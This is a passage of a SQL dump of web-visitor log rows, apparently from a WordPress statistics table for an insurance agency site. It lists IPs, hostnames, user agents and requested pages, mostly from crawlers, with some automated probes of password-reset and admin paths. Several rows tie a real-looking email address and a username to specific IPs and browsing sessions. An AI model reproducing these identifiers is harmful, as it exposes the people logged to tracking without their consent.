6','','','','','','','','3','0',0),(28650,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032374','188.143.232.15','188.143.232.15','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28653,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032385','188.143.232.15','188.143.232.15','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28656,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032398','188.143.232.15','188.143.232.15','/?page_id=171?a=pwdreset','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28658,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032411','188.143.232.15','188.143.232.15','/?page_id=169','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28661,'0b_eb07d0b444cb24c17a8546005975c3e4','1463032421','188.143.232.15','188.143.232.15','/register/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','3','0',0),(28664,'0b_5d902eb9741acf8f3a3ff425640adb4f','1463033333','88.198.22.8','static.88-198-22-8.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E; MS-RTC EA 2)','','',0,'Win7 x64','IE 10','de','','','Unknown Spider','','','','0','0',0),(28667,'0b_0b660021b0a968b81db6fe3ef6d68749','1463033333','144.76.80.151','static.151.80.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; MDDR; InfoPath.3)','','',0,'Win7 x64','IE 10','de','','','Unknown Spider','','','','0','0',0),(28670,'0b_69b42f575a5c462b5fca119fa8eca618','1463034181','75.134.133.243','75-134-133-243.dhcp.roch.mn.charter.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(28671,'0b_69b42f575a5c462b5fca119fa8eca618','1463034185','75.134.133.243','75-134-133-243.dhcp.roch.mn.charter.com','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(28674,'0b_06b7e8e2d4c12b2c299a0e6ddfc9bab9','1463034836','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(28677,'0b_8cc8a9df85a2c4be8e46def993a75123','1463035153','173.234.159.250','173.234.159.250.rdns.ubiquity.io','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(28680,'0b_8cc8a9df85a2c4be8e46def993a75123','1463035156','173.234.159.250','173.234.159.250.rdns.ubiquity.io','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(28682,'0b_8cc8a9df85a2c4be8e46def993a75123','1463035157','173.234.159.250','173.234.159.250.rdns.ubiquity.io','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(28685,'0b_8cc8a9df85a2c4be8e46def993a75123','1463035159','173.234.159.250','173.234.159.250.rdns.ubiquity.io','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(28686,'0b_8cc8a9df85a2c4be8e46def993a75123','1463035161','173.234.159.250','173.234.159.250.rdns.ubiquity.io','/quotes.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(28688,'0b_8cc8a9df85a2c4be8e46def993a75123','1463035165','173.234.159.250','173.234.159.250.rdns.ubiquity.io','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(28689,'0b_8cc8a9df85a2c4be8e46def993a75123','1463035169','173.234.159.250','173.234.159.250.rdns.ubiquity.io','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(28691,'0b_8cf37cdbafd03ecd7af5cdc2ab55b8dc','1463035553','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00','https://mrwhite.biz/','',0,'WinXP','Opera 8','ua','','','','','','','0','0',0),(28692,'0b_8cf37cdbafd03ecd7af5cdc2ab55b8dc','1463035553','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00','https://mrwhite.biz/','',0,'WinXP','Opera 8','ua','','','','','','','0','0',0),(28695,'0b_d9d4125038473107eab74f152d38ddb0','1463036567','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(28698,'0b_8353d2bd08a8f2b5ad4321e418af5b9b','1463036711','64.237.54.7','64.237.54.7.choopa.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(28701,'0b_0f34be18e44e508778a1357adbe4dfad','1463038103','107.172.161.59','107-172-161-59-host.colocrossing.com','/register/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0','http://www.empireins.com/','',0,'Win8 x64','Firefox 34','us','','','','','','','0','0',0),(28703,'0b_62d3a5435e2d195b980c193c833258a4','1463039573','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(28704,'0b_eee9ae9c427ed297c20c926d10dcd817','1463040778','54.211.110.191','ec2-54-211-110-191.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0','','',0,'Win7','Firefox 4','','','','','','','','0','0',0),(28707,'0b_a12fa4cfbba071110726b110caa9e09a','1463040779','54.211.110.191','ec2-54-211-110-191.compute-1.amazonaws.com','/','Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 NokiaN9','','',0,'Nokia','Nokia','us','','','','','','','0','0',0),(28710,'0b_5163115f47317557e0eae8a395eb19ef','1463040780','54.211.110.191','ec2-54-211-110-191.compute-1.amazonaws.com','/mobile','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(28713,'0b_a12fa4cfbba071110726b110caa9e09a','1463040781','54.211.110.191','ec2-54-211-110-191.compute-1.amazonaws.com','/mobi/','Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 NokiaN9','','',0,'Nokia','Nokia','us','','','','','','','0','0',0),(28715,'0b_5163115f47317557e0eae8a395eb19ef','1463040783','54.211.110.191','ec2-54-211-110-191.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(28718,'0b_5163115f47317557e0eae8a395eb19ef','1463040784','54.211.110.191','ec2-54-211-110-191.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(28719,'0b_eee9ae9c427ed297c20c926d10dcd817','1463040785','54.211.110.191','ec2-54-211-110-191.compute-1.amazonaws.com','/?mobile=1','Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0','','',0,'Win7','Firefox 4','','','','','','','','0','0',0),(28721,'0b_a12fa4cfbba071110726b110caa9e09a','1463040786','54.211.110.191','ec2-54-211-110-191.compute-1.amazonaws.com','/','Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 NokiaN9','','',0,'Nokia','Nokia','us','','','','','','','0','0',0),(28722,'0b_5163115f47317557e0eae8a395eb19ef','1463040787','54.211.110.191','ec2-54-211-110-191.compute-1.amazonaws.com','/mobile','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(28724,'0b_a12fa4cfbba071110726b110caa9e09a','1463040788','54.211.110.191','ec2-54-211-110-191.compute-1.amazonaws.com','/mobi/','Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 NokiaN9','','',0,'Nokia','Nokia','us','','','','','','','0','0',0),(28725,'0b_5163115f47317557e0eae8a395eb19ef','1463040790','54.211.110.191','ec2-54-211-110-191.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(28728,'0b_5163115f47317557e0eae8a395eb19ef','1463040790','54.211.110.191','ec2-54-211-110-191.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(28730,'0b_5163115f47317557e0eae8a395eb19ef','1463040791','54.211.110.191','ec2-54-211-110-191.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','http://empireins.com/','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(28733,'0b_6869239a122613dc99f0f9fb3097f342','1463043389','157.55.39.85','msnbot-157-55-39-85.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(28736,'0b_b09b52e2c53d5f0e50851c8803068635','1463044092','193.171.202.150','tor2r.ins.tor.net.eu.org','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(28737,'0b_71ab0fc997b0019b18f291dc7fb3fdf2','1463044098','212.117.180.21','2.tor.exit.babylon.network','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://burger-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(28740,'0b_dadab418a3430db92cd7d1c5e9659040','1463044507','207.46.13.81','msnbot-207-46-13-81.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(28743,'0b_95d5c5a060ef61d7d6c7c03d6889f5e9','1463044520','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(28746,'0b_f3813e0a640abc378d6f7cd316106ea0','1463045652','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(28749,'0b_efb6cf5efcd30a67f3f9470f03ad4f45','1463045844','46.119.112.23','sol-fttb.23.112.119.46.sovam.net.ua','/robots.txt','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32','','',0,'Win10','Google Chrome','ua','','','Unknown Spider','','','','3','0',0),(28752,'0b_efb6cf5efcd30a67f3f9470f03ad4f45','1463045845','46.119.112.23','sol-fttb.23.112.119.46.sovam.net.ua','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32','','',0,'Win10','Google Chrome','ua','','','Unknown Spider','','','','3','0',0),(28755,'0b_efb6cf5efcd30a67f3f9470f03ad4f45','1463045849','46.119.112.23','sol-fttb.23.112.119.46.sovam.net.ua','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32','','',0,'Win10','Google Chrome','ua','','','','','','','3','0',0),(28758,'0b_432515024523c60921c7bc3b2c59d30d','1463049081','54.241.113.24','ec2-54-241-113-24.us-west-1.compute.amazonaws.com','/','MetaInspector/5.1.1 (+https://github.com/jaimeiniesta/metainspector)','','',0,'','','','','','MetaInspector','','','','0','0',0),(28761,'0b_d63e0dd3e9f158566e7aa4eb13319587','1463049500','66.249.66.21','crawl-66-249-66-21.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(28764,'0b_d63e0dd3e9f158566e7aa4eb13319587','1463049500','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(28766,'0b_9194bd3e4b217a1a8305abff1cb5d421','1463050336','208.115.111.66','208-115-111-66-reverse.wowrack.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(28767,'0b_997a867fdd9380dc3fecb3e240173ab2','1463053237','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(28769,'0b_0d6c9f713c0ddd39180b47baad5a07bd','1463053237','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(28772,'0b_997a867fdd9380dc3fecb3e240173ab2','1463053239','100.43.81.146','spider-100-43-81-146.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(28775,'0b_0d6c9f713c0ddd39180b47baad5a07bd','1463053239','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(28778,'0b_abf38cf1b9061a59b51e6e2fd7db665c','1463053371','52.73.242.178','ec2-52-73-242-178.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.5.1','','',0,'WinVista','Firefox 3','us','','','','','','','0','0',0),(28779,'0b_a901403943c54b54db0e0583846c304b','1463056144','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(28781,'0b_0e911fa4c6ded88cea44735763e446d6','1463056354','96.44.190.42','96.44.190.42.static.quadranet.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'Win7','Firefox 15','ua','','','','','','','0','0',0),(28782,'0b_349f34ac2f4f4eb785c51662e65f3e9a','1463058566','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28785,'0b_349f34ac2f4f4eb785c51662e65f3e9a','1463058568','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(28787,'0b_6e98dd00b9e94ecadb4460929fe951ff','1463059202','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(28790,'0b_6e98dd00b9e94ecadb4460929fe951ff','1463059204','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(28793,'0b_6e98dd00b9e94ecadb4460929fe951ff','1463059209','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(28796,'0b_6e98dd00b9e94ecadb4460929fe951ff','1463059587','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(28797,'0b_6e98dd00b9e94ecadb4460929fe951ff','1463059588','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','0',0),(28800,'0b_6e98dd00b9e94ecadb4460929fe951ff','1463059635','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','roisy','','0','51',0),(28802,'0b_349f34ac2f4f4eb785c51662e65f3e9a','1463059757','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(28803,'0b_349f34ac2f4f4eb785c51662e65f3e9a','1463059758','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(28806,'0b_788f7868caff7ed7c8544705c3094502','1463059796','50.74.240.14','mail.kentco.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','0',0),(28808,'0b_788f7868caff7ed7c8544705c3094502','1463059797','50.74.240.14','mail.kentco.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','0',0),(28809,'0b_788f7868caff7ed7c8544705c3094502','1463059801','50.74.240.14','mail.kentco.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','51',0),(28812,'0b_8bd3395075d38850bed985474a4c5e98','1463060336','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(28814,'0b_3639481ead8a787cc5ec89090f04c5f9','1463060471','172.58.96.37','172.58.96.37','/','Mozilla/5.0 (Linux; Android 5.0; SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(28815,'0b_3639481ead8a787cc5ec89090f04c5f9','1463060477','172.58.96.37','172.58.96.37','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.0; SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(28818,'0b_3639481ead8a787cc5ec89090f04c5f9','1463060498','172.58.96.37','172.58.96.37','/','Mozilla/5.0 (Linux; Android 5.0; SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(28820,'0b_3639481ead8a787cc5ec89090f04c5f9','1463060503','172.58.96.37','172.58.96.37','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.0; SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(28823,'0b_3639481ead8a787cc5ec89090f04c5f9','1463060692','172.58.96.37','172.58.96.37','/insentives/','Mozilla/5.0 (Linux; Android 5.0; SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','51',0),(28826,'0b_3639481ead8a787cc5ec89090f04c5f9','1463060695','172.58.96.37','172.58.96.37','/licensing-contracting/','Mozilla/5.0 (Linux; Android 5.0; SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/insentives/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','51',0),(28829,'0b_3639481ead8a787cc5ec89090f04c5f9','1463060705','172.58.96.37','172.58.96.37','/insentives/','Mozilla/5.0 (Linux; Android 5.0; SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','51',0),(28832,'0b_3639481ead8a787cc5ec89090f04c5f9','1463060741','172.58.96.37','172.58.96.37','/','Mozilla/5.0 (Linux; Android 5.0; SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/insentives/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','51',0),(28833,'0b_3639481ead8a787cc5ec89090f04c5f9','1463060741','172.58.96.37','172.58.96.37','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.0; SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','0',0),(28835,'0b_3639481ead8a787cc5ec89090f04c5f9','1463060746','172.58.96.37','172.58.96.37','/about-us/','Mozilla/5.0 (Linux; Android 5.0; SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','51',0),(28836,'0b_3639481ead8a787cc5ec89090f04c5f9','1463060763','172.58.96.37','172.58.96.37','/agent-tools/','Mozilla/5.0 (Linux; Android 5.0; SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/about-us/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','51',0),(28839,'0b_3639481ead8a787cc5ec89090f04c5f9','1463060769','172.58.96.37','172.58.96.37','/carriers/','Mozilla/5.0 (Linux; Android 5.0; SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Android 5','Chrome 48 Mobile','us','360 x 640','','','','','','0','51',0),(28842,'0b_349f34ac2f4f4eb785c51662e65f3e9a','1463061334','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(28845,'0b_349f34ac2f4f4eb785c51662e65f3e9a','1463061335','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(28847,'0b_788f7868caff7ed7c8544705c3094502','1463061433','50.74.240.14','mail.kentco.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','51',0),(28850,'0b_788f7868caff7ed7c8544705c3094502','1463061434','50.74.240.14','mail.kentco.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1280 x 1024','','','','ABRAVER@KENTCO.COM','','0','0',0),(28851,'0b_da64c85a303afbcd0b67ade65f52698f','1463061830','46.182.28.171','46.182.28.171','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinXP','Firefox 15','ua','','','','','','','0','0',0),(28854,'0b_b13481f0862be6dc8ec36ec9b622d740','1463062355','64.47.214.130','host-64-47-214-130.masergy.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','1280 x 1024','Google','','','','','0','0',0),(28857,'0b_b13481f0862be6dc8ec36ec9b622d740','1463062357','64.47.214.130','host-64-47-214-130.masergy.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 